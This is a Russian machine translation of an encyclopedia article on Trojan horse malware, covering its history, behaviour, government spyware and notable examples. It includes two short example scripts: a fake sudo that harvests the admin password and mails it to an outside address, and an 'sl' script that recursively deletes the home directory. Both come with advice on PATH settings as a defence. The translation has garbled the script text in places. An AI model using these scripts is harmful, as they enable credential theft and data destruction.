stringtranslate.com

Троянский конь (вычислительная техника)

В вычислительной технике троянский конь ( или просто троян ) — это любая вредоносная программа , которая вводит пользователей в заблуждение относительно своих истинных намерений, маскируясь под стандартную программу. Термин происходит от древнегреческой истории о коварной Троянской лошади , которая привела к падению города Троя . [1]

Трояны обычно распространяются с помощью какой-либо формы социальной инженерии . Например, когда пользователя обманывают, заставляя выполнить вложение электронной почты , замаскированное под безобидное (например, обычная форма для заполнения), или нажимая на поддельную рекламу в социальных сетях или где-либо еще. Хотя их полезная нагрузка может быть любой, многие современные формы действуют как бэкдор , связываясь с контроллером, который затем может получить несанкционированный доступ к пораженному компьютеру. [2] Атаки программ-вымогателей часто осуществляются с использованием трояна.

В отличие от компьютерных вирусов и червей , трояны обычно не пытаются внедриться в другие файлы или иным образом распространиться. [3]

Использование термина

Неясно, где и когда эта концепция и этот термин для нее были впервые использованы, но к 1971 году первое руководство по Unix предполагало, что его читатели знают и то, и другое: [4]

Еще одно раннее упоминание содержится в отчете ВВС США за 1974 год об анализе уязвимости компьютерных систем Multics . [5]

Он был популярен благодаря Кену Томпсону в его лекции на вручении премии Тьюринга 1983 года «Размышления о доверии к доверию» [6] , подзаголовок которой был следующим: «В какой степени следует доверять утверждению, что программа свободна от троянских коней? Возможно, важнее доверять людям, которые написали программное обеспечение». Он упомянул, что знал о возможном существовании троянов из отчета о безопасности Multics. [7] [8]

Поведение

После установки трояны могут выполнять ряд вредоносных действий. Многие из них, как правило, связываются с одним или несколькими серверами управления и контроля (C2) в Интернете и ждут инструкций. Поскольку отдельные трояны обычно используют определенный набор портов для этой связи, их можно сравнительно просто обнаружить. Более того, другие вредоносные программы могут потенциально «захватить» троян, используя его в качестве прокси для вредоносных действий. [9]

В немецкоязычных странах шпионское ПО , используемое или созданное правительством, иногда называют govware . Govware — это, как правило, троянское ПО, используемое для перехвата сообщений с целевого компьютера. В некоторых странах, таких как Швейцария и Германия, есть правовая база, регулирующая использование такого ПО. [10] [11] Примерами троянских программ govware являются швейцарские MiniPanzer и MegaPanzer [12] и немецкий «государственный троян» под названием R2D2 . [10] Немецкое govware работает, используя бреши в безопасности, неизвестные широкой публике, и получая доступ к данным смартфона до того, как они будут зашифрованы с помощью других приложений. [13]

Из-за популярности ботнетов среди хакеров и доступности рекламных сервисов, которые позволяют авторам нарушать конфиденциальность своих пользователей, трояны становятся все более распространенными. Согласно опросу, проведенному BitDefender с января по июнь 2009 года, «троянское вредоносное ПО растет, составляя 83% от всех обнаруженных в мире вредоносных программ». Трояны связаны с червями, поскольку они распространяются с помощью червей и путешествуют по Интернету вместе с ними. [14] BitDefender заявил, что около 15% компьютеров являются членами ботнета, обычно завербованного троянской инфекцией. [15]

Недавние расследования показали, что метод троянского коня использовался для атаки на облачные вычислительные системы. Троянская атака на облачные системы пытается внедрить приложение или службу в систему, которая может повлиять на облачные службы, изменив или остановив функциональность. Когда облачная система идентифицирует атаки как легитимные, выполняется служба или приложение, которые могут повредить и заразить облачную систему. [16]

Пример sudo для Linux

Троянский конь — это программа , которая якобы выполняет какую-то законную функцию, но при выполнении ставит под угрозу безопасность пользователя. [17] Простым примером является следующая вредоносная версия команды Linux sudo . Злоумышленник может поместить этот скрипт в общедоступный для записи каталог (например, /tmp). Если администратор случайно окажется в этом каталоге и запустит sudo, то троян может выполниться, скомпрометировав пароль администратора.

#!/usr/bin/env баш# Отключить вывод символов на экран. sudo делает это для того, чтобы пароль пользователя не отображался на экране при его вводе.
stty  -echo# Запрашивать у пользователя пароль, а затем читать ввод. Чтобы скрыть природу этой вредоносной версии, сделайте это 3 раза, чтобы имитировать поведение sudo, когда пользователь вводит неправильный пароль. prompt_count = 1 while [ $prompt_count -le 3 ] ; do echo -n "[sudo] password for $( whoami ) : " read password_input echo sleep 3 # sudo будет делать паузу между повторными запросами prompt_count = $(( prompt_count + 1 )) done                    # Включить эхо символов обратно.
stty echo echo $password_input | mail -s " Пароль $( whoami ) " [email protected]      # Отобразить фактическое сообщение об ошибке sudo, а затем удалить себя. echo "sudo: 3 неверных попытки ввода пароля"
rm $0  выход 1 # sudo возвращает 1 при неудачной попытке ввода пароля

Чтобы предотвратить появление sudo троянского коня , установите .запись в PATHпеременной окружения так, чтобы она находилась в конце. [18] Например: PATH=/usr/local/bin:/usr/bin:..

Пример Linux ls

Наличие .где-то в PATH удобно, но есть одна загвоздка. [19] Другим примером является следующая вредоносная версия команды Linux ls . Однако имя файла не ls; вместо этого оно sl. Злоумышленник поместит этот скрипт в общедоступный для записи каталог (например, /tmp).

#!/usr/bin/env баш# Удалить домашний каталог пользователя, затем удалить себя.
rm  -fr  ~ 2 >/dev/null 0 руб
.

Чтобы не дать злонамеренному программисту предвидеть эту распространенную ошибку при наборе текста:

  1. исключить .в PATH или
  2. alias sl=ls[а]

Известные примеры

Частные и государственные

Доступно для общественности

Обнаружено исследователями безопасности

Капитализация

Термин «троянский конь» происходит от легендарного троянского коня древнего города Троя . По этой причине слово «троян» часто пишется с заглавной буквы. Однако, хотя руководства по стилю и словари различаются, многие предлагают писать слово «троян» с нижнего регистра для обычного использования. [30] [31]

Смотрите также

Ссылки

  1. ^ "Определение троянского коня" . Получено 5 апреля 2012 г. Греческие солдаты, неспособные прорвать оборону города Трои во время многолетней войны, преподнесли городу в качестве мирного приношения большого деревянного коня.
  2. ^ "Разница между вирусами, червями и троянами". Symantec Security Center . Broadcom Inc. Архивировано из оригинала 19 августа 2013 г. Получено 29 марта 2020 г.
  3. ^ "VIRUS-L/comp.virus Frequently Asked Questions (FAQ) v2.00 (Вопрос B3: Что такое троянский конь?)". 9 октября 1995 г. Архивировано из оригинала 5 августа 2020 г. Получено 16 сентября 2019 г.
  4. ^ Томпсон, Кен; Ритчи, Деннис М. «Руководство программиста Unix, 3 ноября 1971 г.» (PDF) . стр. 5 . Получено 28 марта 2020 г. Кроме того, нельзя менять владельца файла с включенным битом set—user—ID, в противном случае можно создать троянских коней, способных несанкционированно использовать чужие файлы.
  5. ^ Каргер, PA; Шелл, RR, «Оценка безопасности Multics: анализ уязвимостей, ESD-TR-74-193» (PDF) , HQ Electronic Systems Division: Hanscom AFB, MA , II , заархивировано из оригинала (PDF) 9 июля 2011 г. , извлечено 24 декабря 2017 г.
  6. ^ Кен Томпсон (1984). «Размышления о доверии к доверию». Commun. ACM . 27 (8): 761–763. doi : 10.1145/358198.358210 ..
  7. ^ Пол А. Каргер; Роджер Р. Шелл (2002), «Тридцать лет спустя: уроки оценки безопасности Multics» (PDF) , ACSAC : 119–126
  8. Каргер и Шелл написали, что Томпсон добавил эту ссылку в более позднюю версию своей конференции Тьюринга: Кен Томпсон (ноябрь 1989 г.), «О доверии к доверию», Unix Review , 7 (11): 70–74
  9. ^ Крапанцано, Джейми (2003). Разбор SubSeven, троянского коня выбора (отчет). Институт SANS . Получено 10 мая 2021 г.
  10. ^ ab Basil Cupa, Троянский конь воскрес: о законности использования правительственного шпионского ПО (Govware), LISS 2013, стр. 419–428
  11. ^ "Häufig gestellte Fragen (Часто задаваемые вопросы)". Федеральный департамент юстиции и полиции. Архивировано из оригинала 6 мая 2013 г.
  12. ^ Данн, Джон (27 августа 2009 г.). «Швейцарский кодер публикует правительственный шпионский троян». TechWorld . Архивировано из оригинала 26 января 2014 г. Получено 10 января 2021 г.
  13. ^ "Немецкая федеральная полиция использует троянский вирус, чтобы обойти шифрование телефона". DW . Получено 14 апреля 2018 г. .
  14. ^ "BitDefender Malware and Spam Survey обнаруживает, что электронные угрозы адаптируются к тенденциям онлайн-поведения". BitDefender . Архивировано из оригинала 8 августа 2009 г. Получено 27 марта 2020 г.
  15. ^ Датта, Ганеш (7 августа 2014 г.). «Что такое трояны?». SecurAid . Архивировано из оригинала 12 августа 2014 г. Получено 27 марта 2020 г.
  16. ^ Канакер, Хасан; Карим, Надер Абдель; Аввад, Самер АБ; Исмаил, Нурул ХА; Зраку, Джамал; Али, Абдулла МФ Аль (20 декабря 2022 г.). «Обнаружение заражения троянским конем в облачной среде с использованием машинного обучения». Международный журнал интерактивных мобильных технологий . 16 (24): 81–106. doi : 10.3991/ijim.v16i24.35763 . ISSN  1865-7923.
  17. ^ Вуд, Патрик Х.; Кочан, Стивен Г. (1985). Безопасность системы UNIX . Hayden Books. стр. 42. ISBN 0-8104-6267-2.
  18. ^ Вуд, Патрик Х.; Кочан, Стивен Г. (1985). Безопасность системы UNIX . Hayden Books. стр. 43. ISBN 0-8104-6267-2. Вышеуказанный троянский конь работает только в том случае, если PATH пользователя настроен на поиск команд в текущем каталоге перед поиском в системных каталогах.
  19. ^ "Что плохого в наличии '.' в вашем $PATH?". Penn Engineering . Получено 28 ноября 2023 г. [ И]сли вы неуклюжий наборщик текста и однажды наберете "sl -l" вместо "ls -l", вы рискуете запустить "./sl", если таковой имеется. Какой-нибудь "умный" программист может предвидеть распространенные ошибки при наборе текста и оставить программы с этими именами разбросанными по всем общедоступным каталогам. Будьте осторожны.
  20. ^ Сет, Кулаков (1998). «Это все еще троянский конь или действительно действенный инструмент удаленного администрирования?» (Отчет). Институт SANS . Получено 10 мая 2021 г.
  21. ^ "Mega-Panzer". SourceForge . 21 сентября 2016 г.
  22. ^ "Mini-Panzer". SourceForge . 18 сентября 2016 г.
  23. ^ «Что такое вирус Sova?». India Today . 16 сентября 2022 г.
  24. ^ «Семейство троянизированного рекламного ПО использует службу специальных возможностей для установки любых приложений – блог Lookout».
  25. ^ Нил, Дэйв (20 ноября 2015 г.). «Shedun trojan adware атакует службу доступности Android». The Inquirer . Incisive Business Media. Архивировано из оригинала 22 ноября 2015 г. Получено 27 марта 2020 г.{{cite web}}: CS1 maint: unfit URL (link)
  26. ^ «Lookout обнаруживает новое троянизированное рекламное ПО; 20 тыс. популярных приложений попали под перекрестный огонь – блог Lookout».
  27. ^ «Вредоносные программы Shuanet, ShiftyBug и Shedun могут автоматически получить права root на вашем Android». 5 ноября 2015 г.
  28. Times, Tech (9 ноября 2015 г.). «Новое семейство вредоносных программ для Android, которые практически невозможно удалить: поприветствуйте Shedun, Shuanet и ShiftyBug».
  29. ^ «Рекламное ПО для Android может устанавливаться само, даже если пользователи явно отказываются от него». 19 ноября 2015 г.
  30. ^ "троян". Collins Advanced Dictionary . Получено 29 марта 2020 г.
  31. ^ "троянский конь". Microsoft Style Guide . Microsoft . Получено 29 марта 2020 г. .

Примечания

  1. ^ Поместите aliasоператор в /etc/profile

Внешние ссылки